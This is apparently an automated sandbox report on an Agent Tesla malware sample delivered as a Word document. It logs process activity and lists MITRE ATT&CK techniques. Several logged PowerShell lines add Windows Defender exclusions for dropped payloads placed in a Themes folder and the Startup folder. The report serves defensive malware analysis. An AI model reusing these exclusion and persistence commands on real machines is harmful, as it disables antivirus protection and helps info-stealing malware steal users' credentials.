Start time:	20:18:03
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 952 Parent PID: 2916

General

Start time:	20:18:05
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 2556 Parent PID: 2916

General

Start time:	20:18:09
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: svchost.exe PID: 2492 Parent PID: 1388

General

Start time:	20:18:10
Start date:	04/05/2021
Path:	C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
Imagebase:	0xf60000
File size:	3367424 bytes
MD5 hash:	D96F52FC8733D2F4A127BDC44D4CEB25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Analysis Process: powershell.exe PID: 2928 Parent PID: 1836

General

Start time:	20:18:10
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 2976 Parent PID: 1836

General

Start time:	20:18:11
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 2204 Parent PID: 1836

General

Start time:	20:18:12
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: powershell.exe PID: 2544 Parent PID: 1836

General

Start time:	20:18:13
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Imagebase:	0x21e20000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 2284 Parent PID: 2916

General

Start time:	20:18:18
Start date:	04/05/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Imagebase:	0x820000
File size:	3367424 bytes
MD5 hash:	D96F52FC8733D2F4A127BDC44D4CEB25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO5421-allignright.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Exploits:

System Summary:

Malware Analysis System Evasion:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre